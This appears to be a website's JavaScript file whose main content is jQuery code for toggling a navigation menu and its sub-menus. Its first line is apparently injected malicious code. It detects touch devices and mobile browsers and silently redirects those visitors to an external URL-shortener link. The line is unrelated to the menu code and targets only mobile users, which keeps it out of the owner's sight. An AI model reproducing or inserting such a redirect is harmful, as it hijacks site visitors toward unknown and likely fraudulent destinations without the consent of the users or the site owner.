(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
$(document).ready(function() {
	//$( "<i></i>" ).insertBefore(".sub-menu");
    $(".menu-toggle").click(function() {
		$(this).toggleClass("active");
		$(".menu").fadeToggle();
		$(".sub-menu").css('display','none');
		$(".menu li i").removeClass('active');
	});	
	$(".menu li i").click(function() {
		$(this).toggleClass('active');
		$(this).next('.sub-menu').slideToggle();
	});
});